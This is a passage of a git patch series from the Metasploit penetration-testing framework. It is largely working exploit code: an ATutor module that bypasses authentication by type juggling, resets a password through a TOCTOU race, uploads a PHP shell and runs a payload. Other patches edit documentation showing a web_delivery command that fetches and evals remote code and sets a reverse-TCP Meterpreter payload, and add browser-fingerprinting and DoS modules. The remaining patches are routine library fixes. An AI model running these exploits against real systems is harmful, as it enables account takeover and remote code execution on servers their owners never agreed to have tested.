79 of password_reminder.php + days = (Time.now.to_i/60/60/24) + # make a semi strong password, we have to encourage security now :-> + pass = Rex::Text.rand_text_alpha(32) + hash = Rex::Text.sha1(pass) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "password_reminder.php"), + 'vars_post' => { + 'form_change' => 'true', + # the default install script creates a member + # so we know for sure, that it will be 1 + 'id' => '1', + 'g' => days + 1, # needs to be > the number of days since epoch + 'h' => '', # not even checked! + 'form_password_hidden' => hash, # remotely reset the password + 'submit' => 'Submit' + }, + }, redirect_depth = 0) # to validate a successful bypass + + if res and res.code == 302 + return pass + end + # if we land here, the TOCTOU failed us + fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password") + end + + def login(username, hash, check=false) + password = Rex::Text.sha1(Rex::Text.sha1(hash)) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "login.php"), + 'vars_post' => { + 'form_password_hidden' => password, + 'form_login' => username, + 'submit' => 'Login', + 'token' => '', + }, + }) + # poor php developer practices + cookie = "ATutorID=#{$4};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + if res && res.code == 302 + if res.redirection.to_s.include?('bounce.php?course=0') + return cookie + end + end + # auth failed if we land here, bail + if not check + fail_with(Failure::NoAccess, "Authentication failed with username #{username}") + end + return nil + end + + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + post_reference_name: self.refname, + private_data: opts[:password], + origin_type: :service, + private_type: :password, + username: opts[:user] + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + last_attempted_at: Time.now + }.merge(service_data) + + create_credential_login(login_data) + end + + def exploit + # login if needed + if (not datastore['USERNAME'].empty? and not datastore['PASSWORD'].empty?) + report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) + student_cookie = login(datastore['USERNAME'], datastore['PASSWORD']) + print_good("Logged in as #{datastore['USERNAME']}") + # else, we reset the students password via a type juggle vulnerability + else + print_status("Account details are not set, bypassing authentication...") + print_status("Triggering type juggle attack...") + student_cookie = type_juggle + print_good("Successfully bypassed the authentication in #{@number} requests !") + username = find_user(student_cookie) + print_good("Found the username: #{username} !") + password = reset_password + print_good("Successfully reset the #{username}'s account password to #{password} !") + report_cred(user: username, password: password) + student_cookie = login(username, password) + print_good("Logged in as #{username}") + end + + if disclose_web_root + print_good("Found the webroot") + # we got everything. Now onto pwnage + if upload_shell(student_cookie, false) + print_good("Zip upload successful !") + exec_code + end + end + end +end + +=begin +php.ini settings: +display_errors = On +=end From 7e5fced46b4ae970df8315a66498fb651a8f2d18 Mon Sep 17 00:00:00 2001 From: tdoan-r7 Date: Tue, 22 Mar 2016 12:26:55 -0500 Subject: [PATCH 589/686] MS-1196 Minor edits to the kb for the web_delivery module --- .../exploit/multi/script/web_delivery.md | 41 ++++++++----------- 1 file changed, 17 insertions(+), 24 deletions(-) diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md index f5208585ee..91c213f82d 100644 --- a/documentation/modules/exploit/multi/script/web_delivery.md +++ b/documentation/modules/exploit/multi/script/web_delivery.md @@ -1,31 +1,26 @@ -As a web server, web_delivery provides a great way to deliver a payload during post exploitation, -with the intention to stay stealthy because the payload does not touch the disk. +As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk. Currently, web_delivery supports three different languages for delivery: Python, PHP, and Powershell. You should be able to tell which one you can use based on the target environment you are in. -For example: if you have gained access through a PHP application, then it's safe to assume you can -use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to -say the target supports Powershell. +For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell. ## Verification Steps -To be able to use web_delivery, you must gain access to the target machine first, with the ability -to execute either the Python, or PHP, or Powershell interpreter. +To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter. -At that point, you would use web_delivery similar to the following example: +At that point, you would use the web_delivery module like in the following example: 1. Start msfconsole -2. Do: ```use exploit/multi/script/web_delivery``` -3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options) -4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target) -5. Do: ```set LHOST IP``` (The IP the payload should connect back to) +2. Run: ```use exploit/multi/script/web_delivery``` +3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options) +4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target) +5. Run: ```set LHOST IP``` (The IP the payload should connect back to) 6. Do: ```run``` -7. At this point, a handler is up for that payload. And the module should instruct you to execute - a command. -8. Copy the command. Depending on your pentesting scenario, typically you can either inject the - command and get code execution, or run it from the target's shell, and get a session: +7. At this point, a handler is up for that payload, and the module should instruct you to execute a command. +8. Copy the command. Depending on your pentesting scenario, you can either inject the + command and get code execution, or run it from the target's shell and get a session: ``` msf exploit(web_delivery) > run @@ -46,14 +41,13 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/ **Python** -Python is a fairly popular language, especially on unix-based systems. For example, it comes with -Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3. +Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3. **PHP** PHP is a fairly popular language for web servers, especially Apache. -**Powershell/win** +**Powershell/Windows** Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 are the first Windows versions to come with Powershell by default. Older Windows systems such as XP @@ -68,16 +62,15 @@ web_delivery would work nicely for a web application with a command execution vu One way to approach this would be: 1. Start exploit/multi/script/web_delivery -2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that - results in arbitrary code execution. +2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution. 3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session. **Shell upgrade** -web_delivery is also useful to upgrade a shell type payload to a meterpreter one. +web_delivery is also useful to upgrade a shell type payload to a Meterpreter one. Here's how that can be done: 1. Start exploit/multi/script/web_delivery that generates/ -2. On msfconsole, interact with the shell, and copy/pate the command. -3. You should get a meterpreter session. +2. In msfconsole, interact with the shell, and copy/paste the command. +3. You should get a Meterpreter session. From 71109038e7f37cda084c9a5dffbf48dcb01b43c7 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 22 Mar 2016 12:45:28 -0500 Subject: [PATCH 590/686] Update mailmap for Steven Seeley --- .mailmap | 1 + 1 file changed, 1 insertion(+) diff --git a/.mailmap b/.mailmap index 3dafb94713..7ab2a7147d 100644 --- a/.mailmap +++ b/.mailmap @@ -114,6 +114,7 @@ m-1-k-3 Michael Messner Meatballs1 Meatballs1 mubix Rob Fuller +net-ninja Steven Seeley nevdull77 Patrik Karlsson nmonkee nmonkee nullbind nullbind From 8028a9b5ceebc6502c825a7543fa6e341832f48c Mon Sep 17 00:00:00 2001 From: Lexus89 Date: Tue, 22 Mar 2016 18:50:25 +0100 Subject: [PATCH 591/686] Print response fix --- modules/auxiliary/server/http_ntlmrelay.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 44b90c3df1..8110a187b5 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -310,7 +310,7 @@ class MetasploitModule < Msf::Auxiliary else print_status("Auth successful, saving server response in database") end - vprint_status(resp) + vprint_status(resp.to_s) end return [resp, ser_sock] end From 8836393cb11ef803e67d722700636e7cd6b1e471 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 22 Mar 2016 13:56:12 -0500 Subject: [PATCH 592/686] Add aux module to gather browser information. --- modules/auxiliary/gather/browser_info.rb | 85 ++++++++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 modules/auxiliary/gather/browser_info.rb diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb new file mode 100644 index 0000000000..144860ec91 --- /dev/null +++ b/modules/auxiliary/gather/browser_info.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "HTTP Client Information Gather", + 'Description' => %q{ + This module gathers information about a browser that exploits might be interested in, such + as OS name, browser version, plugins, etc. By default, the module will return a fake 404, + but you can customize this output by changing the Custom404 datastore option, and + redirect to an external web page. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r' ], + 'DisclosureDate' => "Mar 22 2016", + 'Actions' => + [ + [ + 'WebServer', { + 'Description' => 'A web that collects information about the browser.' + }] + ], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + )) + end + + def is_key_wanted?(key) + ![:module, :created_at, :tried, :vuln_test, :address].include?(key) + end + + def is_value_wanted?(value) + !(value.nil? || value =~ /^undefined|false/ || !value) + end + + def ignore_items!(target_info) + target_info.delete_if do |key, value| + !is_key_wanted?(key) || !is_value_wanted?(value) + end + end + + def report_host_info(target_info) + opts = { host: target_info[:address] } + opts.merge!(target_info) + report_host(opts) + end + + def translate_script_meaning(value) + case value + when 'script' + 'Browser allows JavaScript' + when 'headers' + 'Browser does not allow JavaScript' + end + end + + def print_target_info(cli, target_info) + print_status("#{cli.peerhost} - We have found the following interesting information:") + report_host_info(target_info) + target_info.each_pair do |key, value| + ignore_items!(target_info) + if key == :source + value = translate_script_meaning(value) + end + print_status("#{cli.peerhost} - #{key} = #{value}") + end + end + + def on_request_exploit(cli, req, target_info) + print_target_info(cli, target_info) + send_not_found(cli) + end + + def run + exploit + end + +end From 9cb43f2153f71ca103054c510bce32edafb99d39 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 22 Mar 2016 14:42:36 -0500 Subject: [PATCH 593/686] Update atutor_filemanager_traversal --- .../http/atutor_filemanager_traversal.rb | 46 ++++++++----------- 1 file changed, 19 insertions(+), 27 deletions(-) diff --git a/modules/exploits/linux/http/atutor_filemanager_traversal.rb b/modules/exploits/linux/http/atutor_filemanager_traversal.rb index c1324a07aa..4ba1746959 100644 --- a/modules/exploits/linux/http/atutor_filemanager_traversal.rb +++ b/modules/exploits/linux/http/atutor_filemanager_traversal.rb @@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"), }) - if res.code == 200 and res.body =~ /#{@test_string}/ + if res and res.code == 200 and res.body =~ /#{@test_string}/ return true end return false @@ -141,34 +141,30 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"), }) @webroot = "/" - @webroot << $1 if res.body =~ /\\/(.*)jscripts\/ATutor_js\.php\<\/b\> / + @webroot << $1 if res and res.body =~ /\\/(.*)jscripts\/ATutor_js\.php\<\/b\> / if @webroot != "/" return true end return false end - def exec_code - # pwnage - res = nil + def call_php(ext) res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.pht"), + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.#{ext}"), 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" }, timeout=0.1) + return res + end + + def exec_code + res = nil + res = call_php("pht") if res == nil - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.phtml"), - 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" - }, timeout=0.1) + res = call_php("phtml") end if res == nil - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.php4"), - 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" - }, timeout=0.1) + res = call_php("php4") end end @@ -191,11 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote return true end # unknown failure... - if res && res.body =~ /Missing zlib extensions/ - fail_with(Failure::NotVulnerable, 'Server is missing zlib extensions') - else - fail_with(Failure::Unknown, 'Unable to upload php code') - end + fail_with(Failure::Unknown, "Unable to upload php code") return false end @@ -209,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote # use that session to leak the username 'agent' => '' }) - username = "#{$1}" if res.body =~ /(.*)<\/span>/ + username = "#{$1}" if res and res.body =~ /(.*)<\/span>/ if username return username end @@ -251,7 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication") end - def reset_password() + def reset_password # this is due to line 79 of password_reminder.php days = (Time.now.to_i/60/60/24) # make a semi strong password, we have to encourage security now :-> @@ -279,13 +271,13 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password") end - def login(username, hash, check=false) - password = Rex::Text.sha1(Rex::Text.sha1(hash)) + def login(username, password, check=false) + hash = Rex::Text.sha1(Rex::Text.sha1(password)) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "login.php"), 'vars_post' => { - 'form_password_hidden' => password, + 'form_password_hidden' => hash, 'form_login' => username, 'submit' => 'Login', 'token' => '', @@ -299,7 +291,7 @@ class MetasploitModule < Msf::Exploit::Remote end end # auth failed if we land here, bail - if not check + unless check fail_with(Failure::NoAccess, "Authentication failed with username #{username}") end return nil From 102d28bda46e645e631b80ecdb6d78f1758f4519 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 22 Mar 2016 14:44:07 -0500 Subject: [PATCH 594/686] Update atutor_filemanager_traversal --- .../exploits/linux/http/atutor_filemanager_traversal.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/atutor_filemanager_traversal.rb b/modules/exploits/linux/http/atutor_filemanager_traversal.rb index 4ba1746959..ef74506ef1 100644 --- a/modules/exploits/linux/http/atutor_filemanager_traversal.rb +++ b/modules/exploits/linux/http/atutor_filemanager_traversal.rb @@ -23,13 +23,11 @@ class MetasploitModule < Msf::Exploit::Remote You are required to login to the target to reach the vulnerability, however this can be done as a student account and remote registration is enabled by default. - Just incase remote registration isnt enabled, this module uses 2 vulnerabilities - in order to bypass the authenication: + Just in case remote registration isn't enabled, this module uses 2 vulnerabilities + in order to bypass the authentication: 1. confirm.php Authentication Bypass Type Juggling vulnerability 2. password_reminder.php Remote Password Reset TOCTOU vulnerability - - ~ spirit of the hack }, 'License' => MSF_LICENSE, 'Author' => @@ -284,7 +282,7 @@ class MetasploitModule < Msf::Exploit::Remote }, }) # poor php developer practices - cookie = "ATutorID=#{$4};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + cookie = "ATutorID=#{$4};" if res && res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ if res && res.code == 302 if res.redirection.to_s.include?('bounce.php?course=0') return cookie From 8bf039a69e888963c60fe1cbdeb24525f3791d90 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 22 Mar 2016 15:56:38 -0500 Subject: [PATCH 595/686] ignore_items! should not be used in a loop because it's not necessary. --- modules/auxiliary/gather/browser_info.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb index 144860ec91..3279767ded 100644 --- a/modules/auxiliary/gather/browser_info.rb +++ b/modules/auxiliary/gather/browser_info.rb @@ -64,8 +64,8 @@ class MetasploitModule < Msf::Auxiliary def print_target_info(cli, target_info) print_status("#{cli.peerhost} - We have found the following interesting information:") report_host_info(target_info) + ignore_items!(target_info) target_info.each_pair do |key, value| - ignore_items!(target_info) if key == :source value = translate_script_meaning(value) end From 5c163960ed3f0d7bfa5c108544419895195743dc Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Tue, 22 Mar 2016 19:07:58 -0500 Subject: [PATCH 596/686] Fix datastore to not freeze options on the default --- lib/msf/core/data_store.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 9f49de0fed..54ea6e8267 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -76,7 +76,7 @@ class DataStore < Hash def import_options(options, imported_by = nil, overwrite = false) options.each_option do |name, opt| # Skip options without a default or if is already a value defined - if !opt.default.nil? && (!self.has_key?(name) || overwrite) + if !opt.default.nil? && (self[name].nil? || overwrite) import_option(name, opt.default, true, imported_by, opt) end end From 22df7c00716f27dc48e8fd3951b8eabb48dc65a3 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Tue, 22 Mar 2016 19:12:53 -0500 Subject: [PATCH 597/686] Fix datastore to validate options w/o a default Options without a default were not pulled into the `@options` hash and therefore were not used to validate options on assignment. I am not entirely sure how this fix works, since it would seem that non-override options would not get pulled in if an option was first set in the global datastore. However, a previous value does not get overridden and new values are validated. Anything further is merely speculation on my part. --- lib/msf/core/data_store.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 54ea6e8267..eeecd6ea38 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -75,8 +75,7 @@ class DataStore < Hash # def import_options(options, imported_by = nil, overwrite = false) options.each_option do |name, opt| - # Skip options without a default or if is already a value defined - if !opt.default.nil? && (self[name].nil? || overwrite) + if self[name].nil? || overwrite import_option(name, opt.default, true, imported_by, opt) end end From ec3a0a108d75f322fc4efcb2c19559ab3c24371d Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Tue, 22 Mar 2016 19:25:51 -0500 Subject: [PATCH 598/686] Change OptPort to inherit from OptInt Fixes the normalize and validate methods. --- lib/msf/core/opt_port.rb | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/opt_port.rb b/lib/msf/core/opt_port.rb index 295ae04538..c24d180a1e 100644 --- a/lib/msf/core/opt_port.rb +++ b/lib/msf/core/opt_port.rb @@ -7,24 +7,13 @@ module Msf # Network port option. # ### -class OptPort < OptBase +class OptPort < OptInt def type return 'port' end - def normalize(value) - value.to_i - end - def valid?(value) - return false if empty_required_value?(value) - - if ((value != nil and value.to_s.empty? == false) and - ((value.to_s.match(/^\d+$/) == nil or value.to_i < 0 or value.to_i > 65535))) - return false - end - - return super + super && normalize(value) <= 65535 && normalize(value) > 0 end end From 866c4718b0582425911ae9ff8daa05fc71277d46 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Tue, 22 Mar 2016 23:01:18 -0500 Subject: [PATCH 599/686] Fix OptPort validation Allow a port value of 0 and don't reject empty values if the option is not required. --- lib/msf/core/opt_port.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/opt_port.rb b/lib/msf/core/opt_port.rb index c24d180a1e..97fb9db7ec 100644 --- a/lib/msf/core/opt_port.rb +++ b/lib/msf/core/opt_port.rb @@ -13,7 +13,11 @@ class OptPort < OptInt end def valid?(value) - super && normalize(value) <= 65535 && normalize(value) > 0 + if !required? and value.to_s.empty? + super + else + super && normalize(value) <= 65535 && normalize(value) >= 0 + end end end From e7b0c60e5c5611ff58a780ae68db1bfbe0e365e6 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Wed, 23 Mar 2016 07:55:29 -0700 Subject: [PATCH 600/686] Bump version of framework to 4.11.18 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 16570248b3..4daa391b99 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.17) + metasploit-framework (4.11.18) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 11bbf7f4e7..ec28016010 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.17" + VERSION = "4.11.18" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 53860bef1f4aef67a12f706f0a80a799af8248b0 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 23 Mar 2016 10:50:24 -0500 Subject: [PATCH 601/686] Make ms09_065_eot_integer passive MS-932 --- modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index cb7f6b02a2..5ad8dc5493 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -28,6 +28,9 @@ class MetasploitModule < Msf::Auxiliary [ 'MSB', 'MS09-065' ], [ 'OSVDB', '59869'] ], + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer', 'DisclosureDate' => 'Nov 10 2009' )) register_options([ From 8c5c0086e6d9895f598d1763fb09d7111d26aceb Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 23 Mar 2016 11:10:23 -0500 Subject: [PATCH 602/686] Change cve_2012_6301 module path & make passive This addresses two things: 1. The module is in the wrong directory. dos/http is for http servers, not browsers. 2. PassiveActions should not be a 2D array. --- .../android/android_stock_browser_iframe.rb | 62 +++++++++++++++++++ ..._stock_browser_iframe_dos_cve_2012_6301.rb | 3 + 2 files changed, 65 insertions(+) create mode 100644 modules/auxiliary/dos/android/android_stock_browser_iframe.rb diff --git a/modules/auxiliary/dos/android/android_stock_browser_iframe.rb b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb new file mode 100644 index 0000000000..9221626ed9 --- /dev/null +++ b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb @@ -0,0 +1,62 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Android Stock Browser Iframe DOS", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with Android 4.0.3. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Jean Pascal Pereira', # Original exploit discovery + 'Jonathan Waggoner' # Metasploit module + ], + 'References' => [ + [ 'PACKETSTORM', '118539'], + [ 'CVE', '2012-6301' ] + ], + 'DisclosureDate' => "Dec 1 2012", + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end diff --git a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb index f1a6fa892d..53b773fbb1 100644 --- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb +++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb @@ -7,6 +7,9 @@ require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 23), 'auxiliary/dos/android/android_stock_browser_iframe') def initialize(info = {}) super( From 0c19d89655d49a095d6d56427de3d36442066343 Mon Sep 17 00:00:00 2001 From: Louis Sato Date: Wed, 23 Mar 2016 11:39:42 -0500 Subject: [PATCH 603/686] add more space for deprecation message --- lib/msf/core/module/deprecated.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb index 2879223d2f..64c846058b 100644 --- a/lib/msf/core/module/deprecated.rb +++ b/lib/msf/core/module/deprecated.rb @@ -60,15 +60,15 @@ module Msf::Module::Deprecated # # @return [void] def print_deprecation_warning - print_warning("*"*72) - print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*") + print_warning("*"*90) + print_warning("*%red"+"The module #{refname} is deprecated!".center(88)+"%clr*") if deprecation_date - print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") + print_warning("*"+"It will be removed on or about #{deprecation_date}".center(88)+"*") end if replacement_module - print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") + print_warning("*"+"Use #{replacement_module} instead".center(88)+"*") end - print_warning("*"*72) + print_warning("*"*90) end def init_ui(input = nil, output = nil) From effee42e2fec608b81394a6ae47df665f5f7ca01 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 23 Mar 2016 13:15:38 -0500 Subject: [PATCH 604/686] Raise a better exception for WSAEADDRINUSE --- lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb index 5875c1b11f..0aa0d31f4d 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb @@ -87,6 +87,8 @@ class Socket return SocketSubsystem::TcpServerChannel.open(client, params) rescue ::Rex::Post::Meterpreter::RequestError => e case e.code + when 10048 + raise ::Rex::AddressInUse.new(params.localhost, params.localport) when 10000 .. 10100 raise ::Rex::ConnectionError.new end @@ -125,7 +127,9 @@ class Socket return nil rescue ::Rex::Post::Meterpreter::RequestError => e case e.code - when 10000 .. 10100 + when 10048 + raise ::Rex::AddressInUse.new(params.localhost, params.localport) + when 10000 .. 10100 raise ::Rex::ConnectionError.new end raise e From 685d8fc58829adb3e02fa16ee989fcd10634668d Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 23 Mar 2016 15:06:35 -0500 Subject: [PATCH 605/686] Use 2.x symbol literal syntax --- lib/rex/post/meterpreter/channels/socket_abstraction.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/rex/post/meterpreter/channels/socket_abstraction.rb b/lib/rex/post/meterpreter/channels/socket_abstraction.rb index 8ec61ff2ac..429db0edcb 100644 --- a/lib/rex/post/meterpreter/channels/socket_abstraction.rb +++ b/lib/rex/post/meterpreter/channels/socket_abstraction.rb @@ -18,8 +18,6 @@ module Meterpreter ### module SocketAbstraction - # include Rex::IO::SocketAbstraction - class << self def cls raise NotImplementedError @@ -53,10 +51,10 @@ module SocketAbstraction [ tmp, "#{maddr}", "#{mport}" ] end - %w{localhost localport peerhost peerport}.map do |meth| - define_method(meth.to_sym) { + %i{localhost localport peerhost peerport}.map do |meth| + define_method(meth) { return super if not channel - channel.params.send(meth.to_sym) + channel.params.send(meth) } end @@ -87,6 +85,7 @@ module SocketAbstraction attr_accessor :channel end + ## # # Constructor From 98355c397c4a569cde36d7a1cf4c78e6a588a56a Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 23 Mar 2016 15:07:00 -0500 Subject: [PATCH 606/686] Clean up some variable names --- .../post/meterpreter/channels/socket_abstraction.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/rex/post/meterpreter/channels/socket_abstraction.rb b/lib/rex/post/meterpreter/channels/socket_abstraction.rb index 429db0edcb..b08965d35b 100644 --- a/lib/rex/post/meterpreter/channels/socket_abstraction.rb +++ b/lib/rex/post/meterpreter/channels/socket_abstraction.rb @@ -38,17 +38,17 @@ module SocketAbstraction csock = csock.channel.client.sock hops += 1 end - tmp,caddr,cport = csock.getsockname - tmp,raddr,rport = csock.getpeername - maddr,mport = [ channel.params.localhost, channel.params.localport ] - [ tmp, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ] + _address_family,caddr,_cport = csock.getsockname + address_family,raddr,_rport = csock.getpeername + _maddr,mport = [ channel.params.localhost, channel.params.localport ] + [ address_family, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ] end def getpeername return super if not channel - tmp,caddr,cport = channel.client.sock.getpeername + address_family,_caddr,_cport = channel.client.sock.getpeername maddr,mport = [ channel.params.peerhost, channel.params.peerport ] - [ tmp, "#{maddr}", "#{mport}" ] + [ address_family, "#{maddr}", "#{mport}" ] end %i{localhost localport peerhost peerport}.map do |meth| From 